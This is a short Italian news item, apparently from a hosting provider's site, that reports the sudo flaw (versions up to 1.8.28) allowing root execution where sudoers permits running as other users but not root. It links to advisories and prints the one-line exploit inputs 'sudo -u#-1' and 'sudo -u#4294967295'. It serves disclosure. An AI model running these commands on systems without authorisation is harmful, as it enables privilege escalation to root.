Vulnerabilità in sudo

Un errore in sudo permette di eseguire qualsiasi file eseguibile come utente root, se nella /etc/sudoers è consentita la sua esecuzione da altri utenti e vietata per root.

L'exploit dell'errore è molto semplice:

sudo -u#-1 id -u

oppure:

sudo -u#4294967295 id -u

L'errore è presente in tutte le versioni di sudo fino alla 1.8.28

Dettagli:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

Fonte: linux.org.ru

Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server 🔥 Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server | ProHoster